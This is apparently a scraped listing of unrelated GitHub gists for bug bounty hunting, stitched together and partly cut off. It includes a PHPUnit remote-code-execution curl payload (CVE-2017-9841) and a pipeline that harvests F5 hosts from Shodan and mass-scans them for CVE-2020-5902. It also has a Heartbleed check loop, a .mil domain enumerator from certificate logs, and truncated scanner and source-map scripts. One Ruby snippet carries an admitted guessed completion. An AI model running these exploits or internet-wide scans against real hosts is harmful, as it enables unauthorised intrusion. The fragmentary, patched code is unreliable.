Khaled Mohamed xElkomy
@keerok
keerok / README.md
Last active October 17, 2021 14:51
client-side prototype pollution gadget using cross-origin embedded reddit posts
🔥Complete Bug Bounty Cheat Sheet🔥
XSS
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
https://github.com/ismailtasdelen/xss-payload-list
SQLi
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md
# Copyright 2017-2020 Jeff Foley. All rights reserved.
# Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.
# Should results only be collected passively and without DNS resolution? Not recommended.
#mode = passive
mode = active
# The directory that stores the Cayley graph database and other output files
# The default for Linux systems is: $HOME/.config/amass
#output_directory = amass
@yassineaboukir
yassineaboukir / gist:1501de6f60dce148824d3001e83fb263
Created September 10, 2020 11:17
PHPUnit RCE PoC (CVE-2017-9841)
$ curl --data "<?php echo(pi());" http://localhost:8888/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Source: http://web.archive.org/web/20170701212357/http://phpunit.vulnbusters.com/
@0xatul
0xatul / grabdomains.rb
Created August 27, 2020 12:04
Grab DoD root domains in scope of DoD, written by dee-see
require 'open3'
require 'net/http'
require 'nokogiri'
require 'parallel'
# Requires the nokogiri gem (`gem install nokogiri`), the parallel gem (`gem install parallel`) and the psql client for PostgreSQL.

# Query the crt.sh certificate-transparency database (public guest PostgreSQL access) for every
# certificate name ending in .mil, then strip leading whitespace and wildcard prefixes,
# drop blank lines and de-duplicate.
def crtsh
  Open3.pipeline_rw 'psql -t -h crt.sh -p 5432 -U guest certwatch', "sed -e 's:^ *::g' -e 's:^*\\.::g' -e '/^$/d'", 'sort -u', "sed -e 's:*.::g'" do |i, o, t|
    i.write("SELECT ci.NAME_VALUE NAME_VALUE FROM certificate_identity ci WHERE ci.NAME_TYPE = 'dNSName' AND reverse(lower(ci.NAME_VALUE)) LIKE reverse(lower('%.mil'));")
    i.close # send EOF so psql executes the query; the gist preview ends at the write above,
            # the block is closed here (assumed completion) so the method parses and returns the names
    o.read.split("\n")
  end
end
@LuD1161
LuD1161 / f5_here_i_come.sh
Last active March 8, 2022 02:52
F5 Slapdash attempt
# Get all the F5 IPs from Shodan | Get script here : https://gist.github.com/LuD1161/2087aea80e8771a4af069c33b4078570
python3 shodan_query.py "http.favicon.hash:-335242539" results_f5.txt | tee -a output.txt
cat output.txt | grep -i "host :" | cut -d":" -f2 | cut -d" " -f2 | httpx -threads 400 -ports 80,443,8443,4443 -silent | nuclei -t cves/CVE-2020-5902.yaml -o results.txt
cut -d" " -f3 results.txt > targets.txt
sed -i -e "s/\.\;/\.\\\;/g" targets.txt # escape semicolon to pass to interlace
interlace -tL ./targets.txt -threads 100 -c "echo _target_; curl --insecure -v _target_ 2>&1 | awk 'BEGIN { cert=0 } /^\* SSL connection/ { cert=1 } /^\*/ { if (cert) print }'" -v | tee -a all_certs.txt
@Sturtuk
Sturtuk / extract_mapjs.php
Created June 24, 2020 02:44
Extract source code & directories from the javascript .map files
<?php
/**
* Created by PhpStorm.
* User: edwinsturt
* Date: 2020-06-24
* Time: 00:45
*/
$file = 'main.ff0058ad.js.map';
cat temp.txt| while read line ; do echo "QUIT"|openssl s_client -connect $line:443 2>&1|grep 'server extension "heartbeat" (id=15)' || echo $line: safe; done
@dwisiswant0
dwisiswant0 / .bash_profile
Created May 27, 2020 07:38
SQLi & XSS Vulnerability Scanner
###
# ▶ go get -u github.com/lc/gau
# ▶ go get -u github.com/tomnomnom/qsreplace
# ▶ go get -u github.com/tomnomnom/hacks/kxss
# ▶ go get -u github.com/hahwul/dalfox
# ▶ git clone https://github.com/dwisiswant0/DSSS
###
gauq() {